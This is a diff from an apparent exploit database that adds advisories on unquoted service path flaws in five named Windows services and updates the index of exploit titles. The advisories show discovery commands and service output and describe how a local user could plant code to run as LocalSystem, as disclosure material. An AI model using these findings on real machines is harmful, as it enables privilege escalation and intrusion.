TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : iDeskService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

35
exploits/windows/local/49019.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path
# Discovery by: Carlos Roa
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home
# Tested Version: 5.1.0.8
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Professional 64 bits (spanish)
# Step to discover Unquoted Service Path:
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto| findstr /i /v "C:\Windows\\" | findstr /i /v """
Canon Inkjet Printer/Scanner/Fax Extended Survey Program IJPLMSVC C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE Auto
# Service info:
C:\Users>sc qc IJPLMSVC
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ijplmsvc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Canon Inkjet Printer/Scanner/Fax Extended Survey Program
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

37
exploits/windows/local/49020.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path
# Discovery by: Paulina Girón
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.deepinstinct.com/
# Software Links : https://www.deepinstinct.com/2019/05/22/hp-collaborates-with-deep-instinct-to-roll-out-ai-powered-malware-protection-for-next-generation-hp-elitebook-and-zbook-pcs/
# Tested Version: 1.2.24.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro 64 bits
1)
C:\> wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DeepNetworkService" |findstr /i /v """
Deep Instinct Network Service DeepNetworkService C:\Program Files\HP Sure Sense\DeepNetworkService.exe Auto
2)
C:\> sc qc "DeepNetworkService"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: DeepNetworkService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\HP Sure Sense\DeepNetworkService.exe
GRUPO_ORDEN_CARGA : FSFilter Anti-Virus
ETIQUETA : 0
NOMBRE_MOSTRAR : Deep Instinct Network Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Description Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.

32
exploits/windows/local/49021.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.real.com/
# Tested Version: 18.1.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Enterprise SP1 x64 es
# Step to discover Unquoted Service Path:
c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr
/i /v "C:\Windows\\" | findstr /i /v "RealTimes" | findstr /i /v """
RealTimes Desktop Service RealTimes Desktop Service c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe Auto
# Service info
sc qc "RealTimes Desktop Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: RealTimes Desktop Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : RealTimes Desktop Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.

101
exploits/windows/local/49022.txt Normal file
View file

@ -0,0 +1,101 @@
# Exploit Title: DiskBoss v11.7.28 - Multiple Services Unquoted Service Path
# Date: 2020-8-20
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://www.diskboss.com/
# Software Link: https://www.diskboss.com/downloads.html
# Version: v11.7.28
# Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763
# Product | Version
# DiskBoss v11.7.28
# DiskBoss Pro v11.7.28
# DiskBoss Ultimate v11.7.28
# DiskBoss Server v11.7.28
# DiskBoss Enterprise v11.7.28
# All the listed products are vulnerable to Unquoted Service path. Any low privileged user can elevate their privileges using any of these services.
# Services info:
C:\Users\m507>sc qc "DiskBoss Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\DiskBoss\bin\diskbsa.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
C:\Users\m507>sc qc "DiskBoss Enterprise"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Enterprise
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Enterprise\bin\diskbss.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Enterprise
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
C:\Users\m507>sc qc "DiskBoss Ultimate Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Ultimate Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Ultimate\bin\diskbsa.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Ultimate Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
C:\Users\m507>sc qc "DiskBoss Server"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Server
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Server\bin\diskbss.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
C:\Users\m507>sc qc "DiskBoss Pro Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Pro Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Pro\bin\diskbsa.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Pro Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.

28
exploits/windows/local/49023.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path
# Date: 2020-8-20
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://www.cybertronsoft.com/
# Software Link: https://www.cybertronsoft.com/download/privacy-drive-setup.exe
# Version: Version 3.17.0 Build 1456
# Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763
# Service info:
C:\Users\m507>sc qc PDSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: PDSvc
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Cybertron\Privacy Drive\pdsvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : PrivacyDrive Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.

24
files_exploits.csv
View file

@ -10400,6 +10400,27 @@ id,file,description,date,author,type,platform,port
48982,exploits/windows/local/48982.pdf,"Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)",2020-11-02,"Nassim Asrir",local,windows,
48983,exploits/windows/local/48983.txt,"Quick N Easy FTP Service 3.2 - Unquoted Service Path",2020-11-02,yunaranyancat,local,windows,
48993,exploits/windows/local/48993.pl,"Amarok 2.8.0 - Denial-of-Service",2020-11-05,FishballAndMeatball,local,windows,
49002,exploits/windows/local/49002.txt,"HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows,
49003,exploits/windows/local/49003.txt,"KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49004,exploits/windows/local/49004.txt,"Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49005,exploits/windows/local/49005.txt,"OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows,
49006,exploits/windows/local/49006.txt,"IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49007,exploits/windows/local/49007.txt,"Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49008,exploits/windows/local/49008.txt,"DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49009,exploits/windows/local/49009.txt,"Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows,
49010,exploits/windows/local/49010.txt,"HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path",2020-11-09,"Jocelyn Arenas",local,windows,
49011,exploits/windows/local/49011.txt,"Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
49012,exploits/windows/local/49012.txt,"Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
49013,exploits/windows/local/49013.txt,"Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
49014,exploits/windows/local/49014.txt,"Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
49016,exploits/windows/local/49016.txt,"MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49017,exploits/windows/local/49017.txt,"Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49018,exploits/windows/local/49018.txt,"iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path",2020-11-09,"Leslie Lara",local,windows,
49019,exploits/windows/local/49019.txt,"Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path",2020-11-09,"Carlos Roa",local,windows,
49020,exploits/windows/local/49020.txt,"Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path",2020-11-09,"Paulina Girón",local,windows,
49021,exploits/windows/local/49021.txt,"RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path",2020-11-09,"Erick Galindo",local,windows,
49022,exploits/windows/local/49022.txt,"DiskBoss v11.7.28 - Multiple Services Unquoted Service Path",2020-11-09,"Mohammed Alshehri",local,windows,
49023,exploits/windows/local/49023.txt,"Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path",2020-11-09,"Mohammed Alshehri",local,windows,
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@ -40818,6 +40839,9 @@ id,file,description,date,author,type,platform,port
48997,exploits/php/webapps/48997.py,"Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated)",2020-11-06,"Fatih Çelik",webapps,php,
48998,exploits/php/webapps/48998.py,"Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated)",2020-11-06,"Fatih Çelik",webapps,php,
48999,exploits/aspx/webapps/48999.txt,"BlogEngine 3.3.8 - 'Content' Stored XSS",2020-11-06,"Andrey Stoykov",webapps,aspx,
49000,exploits/hardware/webapps/49000.txt,"Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF",2020-11-09,"Jinson Varghese Behanan",webapps,hardware,
49001,exploits/php/webapps/49001.py,"SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)",2020-11-09,"M. Cory Billington",webapps,php,
49024,exploits/multiple/webapps/49024.txt,"Joplin 1.2.6 - 'link' Cross Site Scripting",2020-11-09,"Philip Holbrook",webapps,multiple,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,

Can't render this file because it is too large.